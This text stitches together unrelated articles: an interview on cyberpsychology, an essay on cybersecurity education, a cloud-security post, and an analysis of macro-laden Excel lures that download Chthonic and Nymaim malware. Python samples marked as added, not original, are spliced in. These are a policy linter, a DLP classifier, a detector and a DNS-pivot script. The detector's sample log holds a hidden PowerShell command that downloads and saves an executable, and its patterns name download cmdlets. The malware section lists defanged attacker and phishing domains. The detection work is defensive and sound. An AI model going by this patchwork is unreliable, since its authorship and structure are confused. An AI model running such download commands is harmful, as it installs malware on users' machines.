Editor’s note: Dr. Mary Aiken, a cyberpsychologist, expert in cyber behavioral analysis and author, will deliver the closing keynote address at CSX North America 2017, to take place 2-4 October in Washington, D.C., USA; and CSX Europe 2017, to take place 30 October-1 November in London. Aiken recently visited with ISACA Now about several of her core areas of interest, including digital ethics and how parents can combat some of the cyber threats that could harm their children. The following is an edited transcript:
ISACA Now: What intrigued you about pursuing cyber behavioral analysis?
As a cyberpsychologist, I maintain that human behaviour can fundamentally change in cyberspace. Powerful drivers such as (perceived) anonymity, online disinhibition and psychological immersion, along with minimization of authority online, dictate that people can act very differently in cyber contexts. Therefore, there is a need for new behavioral scientific approaches and analysis in terms of understanding human, and specifically criminal, behavior mediated by technology.
ISACA Now: What should organizations be especially mindful about from a digital ethics standpoint?
In 2016, NATO declared that cyberspace was a ‘domain of operations.’ People like me have been talking about cyberspace for over a decade, but this was a paradigm shift in terms of an official acknowledgement that ‘cyber’ is actually a place, an environment. This recognition gives us a great opportunity to draw on the learnings of the environmental movement. What happens in cyberspace impacts the so-called real world, and vice versa. We should therefore be very protective of this new cyber environment.
The “precautionary principle” has been used to great effect in the environmental movement, placing the onus on companies to prove that their products are doing no harm. From an ethical perspective, if we apply the precautionary principle to cyberspace, then the onus will be on organizations to prove that their digital products do no harm. We are all familiar with the benefits of Corporate Social Responsibility (CSR). There is now an exciting opportunity for organizations to practice Cyber CSR.
ISACA Now: Which aspects of your research on virtual behavioral profiling tend to surprise people the most?
In terms of behavioral profiling, I have been involved in a dozen different research silos – everything from cyberchondria to organized cybercrime – and the one thing that I have observed is that whenever technology interfaces with a base human disposition, the result tends to be amplified and accelerated. I called this ‘the Cyber Effect,’ and wrote a book about it. A lot of people were surprised and fascinated by this insight; I believe it could be the E = mc² of this century. If we could figure out and factor this escalation, then we could also look at technological solutions to de-escalate.
ISACA Now: What do you see as the most positive potentials of technology across the cyber environment today?
I believe that AI offers incredible potential across the cyber environment. Many of the problems that we experience in cyber contexts are in fact ‘big data’ type problems – for example cyberbullying. If we could develop machine intelligence solutions to technology-facilitated problem behaviors, then I firmly believe we could help to create a better cyber society for all, and most importantly for those who are vulnerable, such as children.
ISACA Now: Cyberchondria is probably a new concept for a lot of people. How would you characterize that term, and how prevalent is it?
Searches about health and illness are among the most popular search topics. There is lots of constructive and helpful information available online, from quality medical websites, such as the Mayo Clinic. However, it is difficult from an untrained human perspective to be objective in terms of the interpretation of bodily symptoms, and subsequent translation into medical search. There is a word for what can go wrong. Cyberchondria is a form of hypochondria manifested online.
It is described as anxiety induced as a result of escalation to review morbid or serious content while engaging in health-related search. What does that mean? It means that you have a headache (that could be anything from a hangover to a migraine), and you start clicking to read about brain tumors, and experience anxiety as a result. In other words, you may be perfectly well in physical terms, but may end up with a nasty dose of health anxiety.
ISACA Now: How concerned should parents be about cyberbullying, and what should they be doing to help their kids navigate the digital world?
Cyberbullying is a serious issue for parents, and I am very concerned about what society should be doing to tackle it. Let’s think about it like this. Real-world bullying is a problem – why? With a harsh word or punch on the playground, there is little or no evidence. However, cyberbullying is nothing but evidence; in fact, you cannot cyber-bully without leaving a significant digital trail. So, how did we ever get to a point where cyberbullying was a bigger problem than real-world bullying? There are solutions.
We could develop AI technologies for telecommunications and social media platforms that (with parental consent) could monitor digital traffic to children. At the point at which the behavior escalates in terms of bullying, the AI could trigger a digital outreach to the child to “go and get help,” and a digital outreach to the parent to “go talk to your child.” Parents should not be the last to know that their child is being cyber-bullied.
ISACA Now: If you had one key inspirational message for the ISACA business technology professional community today, what would that be?
I am absolutely pro-technology. I could not do my job as a cyberpsychologist without spending most of my time online. I firmly believe that in time we will develop a whole range of technological solutions to technology-facilitated problem behaviors. It is important to remember that technology is not good or bad; it is either used well or poorly by humans.
The National Crime Agency recently revealed a fascinating intelligence assessment, uncovering the ‘pathways into cyber crime’. The key finding was that most young hackers are motivated, not by financial reward, but by idealism. The NCA added that many of those involved in cyber-crime had “highly marketable” skill sets, and evidence showed that positive role models could help steer ex-offenders towards productive technology careers.
Many people feel that re-training young cyber offenders as cyber security professionals offers a chance to kill two birds with one stone; reducing cyber-crime and simultaneously helping to reduce the cyber skills shortage. The NCA proposed creating a “toolkit of positive diversions” for young people deemed to be at risk of online criminality, such as positive mentors, coding clubs and job opportunities.
It is certainly true that today’s cybersecurity profession is in desperate need of more young talent. Our Global Information Security Workforce Study found that only 12% of the UK workforce is under 35. The NCA’s initiative is a welcome one if it can steer enthusiastic and gifted young people towards the many career opportunities awaiting them, recognising that the devil makes work for idle hands.
However, if we are to find a long-term solution to youth cyber-crime and the skills gap, it is not sufficient to target educational resources, mentors and job opportunities at a narrow band of gifted youngsters on the periphery of cyber-crime. The true solution is to make such career opportunities available to all by making cybersecurity a core aspect of the education system at all levels and across a range of relevant subjects, helping prepare the future generation for work in a digital economy. Cybersecurity is increasingly fundamental to many industries and many different jobs, from engineering to web design, and the education system needs to reflect this. Why wait until young people are already on the periphery of cyber-crime to divert them onto the straight and narrow when we can equip all young people with the skills to make a positive contribution from the outset?
Fortunately, this is starting to happen now. (ISC)² has worked with organisations including the Council of Professors and Heads of Computing (CPHC), to design cybersecurity Principles and Learning Outcomes which have been turned into part of the official accreditation criteria for all UK computing degrees under the bodies BCS and the Chartered Institute for IT.
At a subsequent curriculum development roadshow supported by the Cabinet Office, 60 UK universities demonstrated a will to champion and embed cybersecurity more comprehensively across their computing degree courses. There are now opportunities to go further and teach cybersecurity within an array of popular disciplines from psychology to business management. Further efforts are being made in Further Education, with our involvement in the development of the UK’s first ever cybersecurity EPQ helping to embed cybersecurity skills in curricula at all levels.
Employers could also aid this effort by working with colleges and universities to ‘mentor’ promising students, organising graduate recruitment fairs and offering cyber apprenticeships to graduates or college leavers.
I recently attended an inspiring event at the Plymouth Science Park hosted by Bluescreen IT, which echoed these very sentiments of bringing cybersecurity into the fold at a much earlier stage. The event, which brought together leading organisations including businesses, schools, universities and the local authority, examined how recent online threats and the shortage of qualified and experienced cybersecurity professionals could be tackled by both business and government. It was proposed that by bringing their respective bodies together, their agendas could be aligned and integrated to form a proactive ‘cyber cluster’, enabling parties to shape curriculums to incorporate information security and in turn provide a pipeline of nurtured talent to the profession and local businesses.
With the internet overtaking TV as children’s favourite pastime, there is also a real opportunity to engage children in cybersecurity by incorporating it into primary and secondary school teaching materials. Cybersecurity content could be included in everything from maths classes to World War One and Two history lessons on the role of code-breakers at ‘Room 40’ and Bletchley Park. Teachers could create code-breaking competitions to make the content engaging for children.
There is also an opportunity to teach internet safety to all young people, in an age when children are increasingly exposed to the hazards of the internet, from hackers to cyber-stalkers. (ISC)² volunteers from across the cybersecurity profession have been going into UK schools to teach over 5,000 children each term on everything from ‘sexting’ to cyber-bullying. Similar initiatives could be rolled out across all schools at a national level.
The only viable long-term solution to youth cyber-crime and the skills shortage is to ensure that our education system gives all students (and their parents) the necessary skills, knowledge and awareness to feel included in, able to contribute to and benefit from the digital economy.
By Adrian Davis, CISSP, Managing Director EMEA, (ISC)²
Even before cloud adoption became mainstream, it wasn’t uncommon for IT security needs to conflict with both business strategy and end user preferences. Almost everyone with a background in security has found themselves in the awkward position of having to advise on going against a technology with significant appeal and value because it would introduce too much risk.
In my time working both as a vendor and as a risk management consultant, few IT leaders I’ve come across want to be a roadblock when it comes to achieving business goals and accommodating (reasonable) user preferences and requests. However, they also understand the costs of a potential security or non-compliance issue down the road. Unfortunately, many IT security teams have also experienced the frustration of being overridden, either officially by executives electing to accept the risk or by users adopting unregulated, unsanctioned applications and platforms, introducing risk into the organization against their recommendation.
In today’s world of cloud computing there are more vendor options than ever and end users often come to the table with their preferences and demands. More and more I speak to IT and security leaders who have been directed to move to the cloud or have been pressured to move data to a specific cloud application for business reasons but find themselves saying no because the native cloud security controls are not enough.
Fortunately, in the past few years, solutions have emerged that allow IT and security leaders to stop saying no and instead enable the adoption of business-driven requests while giving IT teams the security controls they need to reduce risk. Cloud vendors spend a lot of time and resources to secure their infrastructure and applications, but what they are not responsible for is ensuring compliant cloud usage in their customers’ organizations.
The legal liability for data breaches is yours and yours alone. Only you can guarantee compliant usage within your organization, so it’s important to understand the types of data that will be flowing into the cloud environment and work with various stakeholders to enforce controls that will reduce risk to an acceptable level and comply with any geographic or industry regulations.
It can be tempting, as always, to lock everything down and allow users only the most basic functionality in cloud applications. However, that often results in a poor user experience and leads to unsanctioned cloud use and shadow IT.
While cloud environments are very different from on-premises environments, many of the security principles are still valid. As a foundation, I often guide organizations to look at what they are doing today for on-premises security and begin with extending those same principles into the cloud. Three useful principles to begin with are:
Privilege Management
Privilege management has been used in enterprises for years as an on-premises method to secure sensitive data and guide compliant user behavior by limiting access. In some cloud services, like Amazon Web Services (AWS), individual administrators can quickly amass enough power to cause significant downtime or security concerns, either unintentionally or through compromised credentials. Ensuring appropriate privilege management in the cloud can help reduce that risk.
In addition to traditional privilege management, the cloud also introduces a unique challenge when it comes to cloud service providers. Since they can access your cloud instance, it’s important to factor into your cloud risk assessment that your cloud provider also has access to your data. If you’re concerned about insider threats or government data requests served directly to the cloud provider, evaluating options to segregate data from your cloud provider is recommended.
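One concrete way to keep an individual AWS administrator from amassing that much power is to review the IAM policies attached to them for wildcard grants before they are applied. The following linter is an added example, not code from the original post or from any vendor; the policy documents, account ID and ARNs in it are constructed samples, and the read-only verb prefixes are an assumption you would tune to your own environment.

```python
"""Lint AWS IAM policy documents for over-broad grants.

Added example, not code from the original post: flags Allow statements that
hand an identity wildcard actions or wildcard resources, the kind of grant
that lets one administrator (or whoever steals that administrator's
credentials) take down or empty an account. All policy documents below are
constructed samples; the account ID and ARNs are placeholders.
"""
import json
from typing import Any, Dict, List

# Constructed sample: the "everything" policy an admin might attach to themselves.
OVERBROAD_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
})

# Constructed sample: IAM rights on every resource, enough to mint new admins.
IAM_WILDCARD_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": {"Effect": "Allow", "Action": "iam:*", "Resource": "*"},
})

# Constructed sample: the same job (read one bucket, write one log group)
# expressed with explicit actions and resource ARNs.
SCOPED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::example-reports",
                      "arn:aws:s3:::example-reports/*"]},
        {"Effect": "Allow",
         "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
         "Resource": "arn:aws:logs:eu-west-1:123456789012:log-group:/app/reports:*"},
    ],
})

# Assumption: verbs with these prefixes are treated as read-only.
READ_ONLY_PREFIXES = ("Get", "List", "Describe")


def _as_list(value: Any) -> List[Any]:
    """IAM accepts a scalar or a list for Statement, Action and Resource."""
    if value is None:
        return []
    return list(value) if isinstance(value, list) else [value]


def _is_mutating(action: str) -> bool:
    """Anything that is not an obvious read verb is treated as mutating."""
    verb = action.split(":")[-1]
    return not verb.startswith(READ_ONLY_PREFIXES)


def lint_policy(document: str) -> List[Dict[str, Any]]:
    """Return one finding per risky Allow statement (Deny statements are skipped).

    Checks: wildcard action "*", service-wide wildcards such as "s3:*",
    any iam:* grant, NotAction (allows everything not listed), and
    mutating actions on Resource "*".
    """
    policy = json.loads(document)
    findings: List[Dict[str, Any]] = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        actions = [str(a) for a in _as_list(stmt.get("Action"))]
        resources = [str(r) for r in _as_list(stmt.get("Resource"))]
        reasons: List[str] = []
        if "*" in actions:
            reasons.append("wildcard action grants full administrative access")
        for act in actions:
            if act != "*" and act.endswith(":*"):
                reasons.append(f"service-wide wildcard action {act}")
            if act.lower().startswith("iam:"):
                reasons.append(f"IAM privilege {act} can be used to escalate")
        if "NotAction" in stmt:
            reasons.append("NotAction allows everything except the listed actions")
        if "*" in resources and any(_is_mutating(a) for a in actions):
            reasons.append("mutating actions allowed on every resource")
        if reasons:
            findings.append({"statement": idx, "reasons": reasons})
    return findings
```

Run it over policies pulled from your account and treat every finding as a conversation with the policy's owner rather than an automatic block; service-linked roles in particular legitimately need broad grants.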
Data Loss Protection
Another reason it’s so important to speak with stakeholders and identify the type of data flowing into the cloud is to determine what data loss protection (DLP) policies you need to enforce. Common data characteristics to look out for include personally identifiable information, credit card numbers, or even source code. If you’re currently using on-premises DLP, it’s a good time to review and update your organization’s already defined patterns and data classification definitions to ensure that they are valid and relevant as you look to extend them to the cloud.
It’s also important to educate end users on what to expect. Good cloud security should be mostly frictionless, but if you decide to enforce policies such as blocking a transaction or requiring additional authentication for sensitive transactions, it’s important to include this in your training materials and in any internal documentation provided to users. It not only lets users know what to expect, leading to fewer helpdesk tickets, but can also be used to refresh users on internal policies and security basics.
Auditing
A key aspect of any data security strategy is to maintain visibility into your data to ensure compliant usage. Companies need to make sure that they do not lose this capability as they migrate their data and infrastructure into the cloud. If you use security information and event management (SIEM) tools today, it’s worth taking the time to decide on what cloud applications and transactions you should integrate into your reports.
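What reviewing those DLP patterns looks like in practice: the classifier below is an added example, not code from the original post or from any DLP product. It checks text for the three data characteristics the post names (card numbers with a Luhn check so that random digit strings do not trip it, a national-ID shape, e-mail addresses as a stand-in for personal data, and source-code markers) and maps the result to the enforcement choices the post mentions. The patterns and sample documents are constructed here; the ID format is an assumption and the thresholds are starting points to tune.

```python
"""Classify text against DLP patterns before it is allowed into a cloud app.

Added example, not code from the original post: a small content classifier
for the data types the post names (payment card numbers, personal
identifiers, source code). Patterns and sample documents are constructed.
"""
import re
from typing import Dict, List

# Candidate card numbers: 13-19 digits, optionally grouped by spaces or dashes.
# The Luhn check in classify() removes most false positives.
CARD_CANDIDATE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")
# Assumed national-ID shape NNN-NN-NNNN (the US SSN layout); adjust per region.
SSN_LIKE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")
# E-mail addresses as a stand-in for personally identifiable information.
EMAIL = re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b")
# Markers that rarely appear outside source code; two or more reads as code.
SOURCE_CODE_MARKERS = (
    re.compile(r"^\s*(?:def|class)\s+\w+\s*[\(:]", re.M),
    re.compile(r"^\s*#include\s*<", re.M),
    re.compile(r"^\s*(?:import|from)\s+\w+", re.M),
    re.compile(r"\bpublic\s+(?:static\s+)?(?:void|class)\b"),
)


def luhn_valid(number: str) -> bool:
    """Luhn checksum as used by payment card numbers; separators are ignored."""
    digits = [int(c) for c in number if c.isdigit()]
    if len(digits) < 13:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def classify(text: str) -> Dict[str, List[str]]:
    """Return the DLP categories matched in text, with the matching fragments."""
    findings: Dict[str, List[str]] = {}
    cards = [m.group(0) for m in CARD_CANDIDATE.finditer(text)
             if luhn_valid(m.group(0))]
    if cards:
        findings["payment_card"] = cards
    ids = SSN_LIKE.findall(text)
    if ids:
        findings["national_id"] = ids
    emails = EMAIL.findall(text)
    if emails:
        findings["email"] = emails
    code_hits = sum(1 for p in SOURCE_CODE_MARKERS if p.search(text))
    if code_hits >= 2:
        findings["source_code"] = [f"{code_hits} code markers"]
    return findings


def decide(findings: Dict[str, List[str]]) -> str:
    """Map findings to an action: block, require step-up auth, or allow."""
    if "payment_card" in findings or "national_id" in findings:
        return "block"
    if findings:
        return "step-up-auth"
    return "allow"


# Constructed sample documents (the card number is a well-known test number).
EXPENSE_NOTE = "Paid with card 4111 1111 1111 1111, receipt sent to jo@example.com"
ORDER_LOG = "Order 1234 5678 9012 3456 shipped to jo@example.com"
SNIPPET = "import os\n\ndef rotate_keys(path):\n    return os.listdir(path)\n"
```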
By extending the controls listed above into your cloud environment, you can establish a common ground of good security practices that protect business enabling technology. With the right tools and strategy in place, it’s possible to stop saying no outright and instead come to the table enabled to empower relevant business demands while maintaining appropriate security and governance controls.
Yael Nishry, Vice President of Business Development, Vaultive
Recently, I’ve been investigating malware utilizing PowerShell and have spent a considerable amount of time refining ways to identify new variants of attacks as they appear. This posting is a follow-up of my previous work on this subject in “Pulling Back the Curtains on EncodedCommand PowerShell Attacks”.
In a sample I recently analyzed, something stood out as extremely suspicious which led me down a rabbit hole, uncovering malicious infrastructure supporting Chthonic, Nymaim, and other malware and malicious websites.
Throughout this blog post I present my analysis and thought process during this research, but if you would just like a list of the findings, they are over on our Unit42 GitHub.
One of these things is not like the others…
Most commonly, PowerShell is launched from a Microsoft Office document that uses a VBA macro to launch PowerShell to perform something malicious – typically downloading the “real” malware to run. I focused my hunting on the PowerShell activity with Palo Alto Networks AutoFocus to determine whether it’s worth digging into further based on “uniqueness” and functionality.
In this case, the first sample I looked at stood out for another reason entirely. If you take a look at the below PowerShell, you’ll quickly understand why.
This code downloads a file from the legitimate Notepad++ website. My initial thought was the worst-case scenario – they’ve been compromised and are distributing malware! I immediately downloaded the file from the website, but everything looked normal. Of course, I had to investigate further.
The sample stayed true to the previous outline I laid out for these attacks: the Microsoft Excel document appeared to be a lure about financial information, specifically a VAT invoice written in Polish as shown below.
Looking under the hood we see the VBA code that builds the PowerShell command and launches it but something seemed off. There are a ton of functions that are clearly decoding information from arrays after which it executes an already decoded PowerShell command. I decided to debug the macro and see exactly what it’s doing before I made any decisions.
If you look at the above image, there are five things to note.
1. The variable ‘horrorr’ (double ‘r’) is the result of all of the previously mentioned decoding functions. This builds a PowerShell command.
2. You can see ‘Shelleeeee horrorr, 0’ commented out; I believe this was intended to launch the previous PowerShell command.
3. The ‘Debug.Print horrorr’ prints the content of that variable in the ‘Immediate’ area shown in the screenshot. The domain in this command is NOT ‘notepad-plus-plus.org’ and can be seen below.
4. The ‘MsgBox’ will pop-up and not display anything, because the variable passed is ‘horror’ (1 ‘r’) along with the message ‘Do you really think I’m not a virus?’ in Polish.
5. The hard coded PowerShell command with ‘notepad-plus-plus.org’ will run.
The most likely conclusion that can be drawn here is that an analyst or researcher obtained this file, modified it to see the content (misspelling the variable name along the way) post-decoding, and uploaded it to see what it did in a sandbox. To be sure though, I needed to find other samples and see how they stacked up against this one.
Going back to the PowerShell command, the initial reason I stopped to look at it was due to the way they concatenated variables to form the download command and output. This also provides a perfect pivot point to hunt for samples. Using the below string to search Process Activity in AutoFocus revealed 171 samples.
The dates were all fairly recent, having been received in the past few days since the beginning of August. The documents shared the same themes for lures but the VBA macro and resulting PowerShell were more along the lines of what I expected.
For sample “538ff577a80748d87b5e738e95c8edd2bd54ea406fe3a75bf452714b17528a87” the following is an excerpt from the VBA macro building the PowerShell command.
Along with the subsequent Process Activity using the newly built PowerShell command, which aligns with what was commented out of the first sample analyzed.
Going back to the Process Activity, we can see the SHA256 value of each downloaded file and compile a list of hashes for further pivoting as shown below.
After iterating over the 171 samples, we’re left with this list of hashes for the downloaded files. Note that there are fewer payloads than there are samples, indicating many of the documents download the same payload.
Below is a table with the compile date and some PDB strings found within a few of the binaries. Most of the compile times are within the past two months, with 6 in August and a couple from as recently as two days ago at the time of this writing.
At least one of the binaries compiled in August had a PDB string I was able to locate online in a collection of other PDB files, so they may be introducing their malicious code into these files before compiling someone else’s project.
Once the file has been downloaded and executed, the new process will launch a legitimate executable, such as “msiexec.exe”, and inject code into it. This code will then download further payloads through a POST request to various websites. This pattern is shared across the original samples.
These HTTP requests match known patterns for a banking Trojan named Chthonic, which is a variant of Zeus. A good 2014 write-up on the malware by Yury Namestnikov, Vladimir Kuskov and Oleg Kupreev at Kaspersky Lab indicates that the returned data is an RC4-encrypted loader that sets up the main Chthonic module, which can download additional modules or malware.
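From a defender's side, the two behaviours described above (an Office application spawning PowerShell with a download command, and a normally quiet system binary such as msiexec.exe making an HTTP POST after code injection) are what you would alert on. The rule set below is an added example, not code from the original post or from AutoFocus; the pipe-separated telemetry format, host names, paths, allowlist and the download URL in the sample are constructed, and only the POST destination reuses a domain named in the post.

```python
"""Detection logic for the two behaviours described in the post.

Added example, not code from the original post. Rule 1: an Office application
spawns PowerShell with download or encoded-command markers. Rule 2: a system
binary that should never talk HTTP (msiexec.exe and friends) makes an
outbound POST. The log format, host names, paths and allowlist are constructed.
"""
import re
from typing import Dict, List

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Markers shared by the samples in the post: download cmdlets and EncodedCommand.
PS_MARKERS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|"
    r"-enc(?:odedcommand)?\b|frombase64string",
    re.I,
)
# Legitimate on every host, but they have no business making HTTP requests.
INJECTION_HOSTS = {"msiexec.exe", "regsvr32.exe", "rundll32.exe"}
ALLOWED_DEST = {"update.example-corp.invalid"}  # constructed allowlist


def parse(line: str) -> Dict[str, str]:
    """Constructed telemetry: 'ts|proc|host|parent|image|cmdline'
    or 'ts|net|host|image|method|dest'."""
    fields = line.rstrip("\n").split("|")
    if fields[1] == "proc":
        keys = ("ts", "type", "host", "parent", "image", "cmdline")
    else:
        keys = ("ts", "type", "host", "image", "method", "dest")
    return dict(zip(keys, fields))


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Apply both rules and return alerts with the evidence that fired them."""
    alerts: List[Dict[str, str]] = []
    for r in records:
        if r["type"] == "proc":
            parent, image = basename(r["parent"]), basename(r["image"])
            if parent in OFFICE_APPS and image in POWERSHELL:
                marker = PS_MARKERS.search(r["cmdline"])
                alerts.append({
                    "host": r["host"],
                    "rule": ("office_spawns_powershell_download" if marker
                             else "office_spawns_powershell"),
                    "severity": "high" if marker else "medium",
                    "evidence": r["cmdline"],
                })
        elif r["type"] == "net":
            image = basename(r["image"])
            if (image in INJECTION_HOSTS and r["method"].upper() == "POST"
                    and r["dest"] not in ALLOWED_DEST):
                alerts.append({
                    "host": r["host"],
                    "rule": "system_binary_http_post",
                    "severity": "high",
                    "evidence": f"{image} POST {r['dest']}",
                })
    return alerts


# Constructed sample telemetry: the lure document spawning PowerShell, the
# injected msiexec.exe check-in, an allowlisted POST, and a benign shell.
SAMPLE_LOG = """\
2017-08-10T09:01:02|proc|ws17|C:\\Windows\\explorer.exe|C:\\Program Files\\Microsoft Office\\EXCEL.EXE|EXCEL.EXE faktura.xls
2017-08-10T09:01:09|proc|ws17|C:\\Program Files\\Microsoft Office\\EXCEL.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -w hidden $a=New-Object Net.WebClient;$a.DownloadFile('http://download.invalid/x.exe','C:\\Users\\Public\\x.exe')
2017-08-10T09:01:15|net|ws17|C:\\Windows\\System32\\msiexec.exe|POST|gefinsioje[.]com
2017-08-10T09:02:00|net|ws17|C:\\Windows\\System32\\msiexec.exe|POST|update.example-corp.invalid
2017-08-10T09:03:00|proc|ws22|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe Get-Process
"""


def run(log_text: str) -> List[Dict[str, str]]:
    """Parse the telemetry and return the alerts it raises."""
    records = [parse(line) for line in log_text.splitlines() if line.strip()]
    return evaluate(records)
```

The second rule fires on the process image alone, so in a real deployment you would join it with the parent-process and injection telemetry your EDR provides to cut noise from installers that legitimately phone home.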
A dab of Nymaim
Iterating once again over the 171 samples and scraping out the HTTP POST requests, I ended up with the below set of domains.
amellet[.]bit
danrnysvp[.]com
ejtmjealr[.]com
firop[.]com
gefinsioje[.]com
gesofgamd[.]com
ponedobla[.]bit
unoset[.]com
Using this as the next pivot, we have 6,034 unique samples that get returned in AutoFocus having made POST requests to these sites. Additionally, we can see there were at least 3 very large campaigns where Palo Alto Networks saw activity to these sites in July.
From these distribution sites, we can see that 5,520 samples are making HTTP requests to them and these samples have been identified as another downloader Trojan named Nymaim.
The majority of the overall samples came from the following four sites.
ejtmjealr[.]com
gefinsioje[.]com
gesofgamd[.]com
ponedobla[.]bit
The ‘ejtmjealr[.]com’ domain is particularly interesting due to a similar domain, ‘ejdqzkd[.]com’, being discussed by Jarosław Jedynak of CERT.PL in this analysis of Nymaim from earlier in the year. They go on to discuss how Nymaim uses a static configuration to contact that domain, which will return IPs that go into a DGA and output the actual IP addresses needed for C2 communication. Ben Baker, Edmund Brumaghin and Jonah Samost of Talos have a fantastic write-up of this process here.
Raising the dead – Infrastructure Archeology
To continue my analysis, I shifted focus to Maltego so as to visually graph the infrastructure. For this task, I used PassiveTotal’s Passive DNS and AutoFocus Maltego transforms. We see below the passive resolutions for these domains and how it reveals a number of IP addresses being shared between the four domains identified above.
All of the 707 IP addresses can be found here. Note that while these IPs have been found to be hosting malicious content, this could change in the future.
Pivoting off the five highlighted IPs above with a shared infrastructure, I pulled the reverse DNS to see what other sites may be present. The below is a sampling of the domains returned through this process.
The “idXXXXX.top” pattern immediately stands out and may suggest a pattern in the static configuration for the initial domains used by the DGA for Nymaim, since the previous two started with “ejX.com”.
Given the level of overlap already, I proceeded to grab all of the passive DNS available for each of the 707 IP addresses. A full list of the domains can be seen here. The below Maltego graph is used to simply illustrate the two distinct clusters of infrastructure that appeared and their interconnectedness.
From the first cluster on the left, if we sort by incoming links per node, a pattern stands out in the domain names looking similar to the previously mentioned Nymaim ones. In the below image, the top domains are sorted by incoming links on the right side. Each link is a corresponding IP address, showing that these domains have been rotated quite a bit across the infrastructure.
A quick search with the AutoFocus transform to pull tag information shows these are specifically related to Nymaim, most likely for the DGA seed; however, looking at domains with fewer links, other malware families begin to emerge.
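The pivot just described (seed domains, the IPs they share, every other domain seen on those IPs, ranked by how many addresses each has rotated through) is mechanical enough to script against any passive DNS export. The code below is an added example, not code from the original post, PassiveTotal or AutoFocus; it starts from the four seed domains named in the post, but the passive DNS records, all IP addresses (RFC 5737 documentation ranges) and the non-seed domains are constructed, and the idNNNNN.top shape is the pattern the post observed, taken here as a search hint rather than a confirmed DGA format.

```python
"""Passive DNS pivoting, following the steps in the post.

Added example, not code from the original post: from the seed domains, find
shared IPs, expand to every domain on them, rank the expansion by distinct
shared IPs per domain (the post's "incoming links") and flag names matching
the idNNNNN.top shape. Records, IPs and non-seed domains are constructed.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

# Seed domains named in the post.
SEEDS = ["ejtmjealr[.]com", "gefinsioje[.]com", "gesofgamd[.]com", "ponedobla[.]bit"]
ID_TOP = re.compile(r"^id\d{5}\.top$")


def refang(domain: str) -> str:
    """Turn 'example[.]com' back into 'example.com' for lookups."""
    return domain.replace("[.]", ".")


def defang(domain: str) -> str:
    """Make a domain safe to paste into a report."""
    return domain.replace(".", "[.]")


# Constructed passive DNS export: (domain, ip) pairs, IPs from RFC 5737 ranges.
PDNS: List[Tuple[str, str]] = [
    ("ejtmjealr.com", "192.0.2.10"), ("ejtmjealr.com", "192.0.2.11"),
    ("ejtmjealr.com", "198.51.100.5"),
    ("gefinsioje.com", "192.0.2.10"), ("gefinsioje.com", "192.0.2.12"),
    ("gesofgamd.com", "192.0.2.10"), ("gesofgamd.com", "192.0.2.11"),
    ("ponedobla.bit", "192.0.2.12"), ("ponedobla.bit", "198.51.100.5"),
    ("id10001.top", "192.0.2.10"), ("id10001.top", "192.0.2.11"),
    ("id10001.top", "192.0.2.12"), ("id10001.top", "198.51.100.5"),
    ("id10002.top", "192.0.2.10"), ("id10002.top", "192.0.2.11"),
    ("shop.example-hosting.invalid", "192.0.2.12"),   # a bystander on one IP
    ("unrelated.invalid", "203.0.113.9"),             # never touches the cluster
]


def index(records: Iterable[Tuple[str, str]]):
    """Build domain -> IPs and IP -> domains maps from (domain, ip) pairs."""
    domain_ips: Dict[str, Set[str]] = defaultdict(set)
    ip_domains: Dict[str, Set[str]] = defaultdict(set)
    for domain, ip in records:
        domain_ips[domain].add(ip)
        ip_domains[ip].add(domain)
    return domain_ips, ip_domains


def shared_infrastructure(domain_ips, seeds: List[str], min_seeds: int = 2) -> Set[str]:
    """IPs on which at least min_seeds of the seed domains have resolved."""
    counts: Dict[str, int] = defaultdict(int)
    for seed in seeds:
        for ip in domain_ips.get(refang(seed), ()):
            counts[ip] += 1
    return {ip for ip, n in counts.items() if n >= min_seeds}


def expand(ip_domains, ips: Set[str]) -> Set[str]:
    """Every domain ever seen on any of the given IPs."""
    return set().union(*(ip_domains[ip] for ip in ips))


def rank_by_links(domain_ips, domains: Set[str], within: Set[str]) -> List[Tuple[str, int]]:
    """Sort domains by how many of the shared IPs they have sat on, descending."""
    scored = [(d, len(domain_ips[d] & within)) for d in domains]
    return sorted(scored, key=lambda t: (-t[1], t[0]))


def dga_seed_candidates(domains: Set[str]) -> List[str]:
    """Names matching the idNNNNN.top shape the post noticed."""
    return sorted(d for d in domains if ID_TOP.match(d))


def pivot(records, seeds: List[str], min_seeds: int = 2) -> Dict[str, object]:
    """Run the whole pivot and return shared IPs, ranked domains and candidates."""
    domain_ips, ip_domains = index(records)
    shared = shared_infrastructure(domain_ips, seeds, min_seeds)
    found = expand(ip_domains, shared) - {refang(s) for s in seeds}
    return {
        "shared_ips": sorted(shared),
        "ranked": rank_by_links(domain_ips, found, shared),
        "dga_candidates": dga_seed_candidates(found),
    }
```

Raising min_seeds is the knob that separates shared attacker infrastructure from a busy hosting provider: on real data, an IP that only one seed ever touched will drag in every tenant of that host.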
The cluster on the right is actually collapsing one collection of entities due to the sheer size of it. Below is the collection expanded in all of its glory.
Below are the domain names linked to the singular IP address in the center.
All of these connected domains follow a pattern similar to phishing attacks masquerading as legitimate services – in this case “online.verify[.]paypal” (588) and “hmrc.secure[.]refund” (1021).
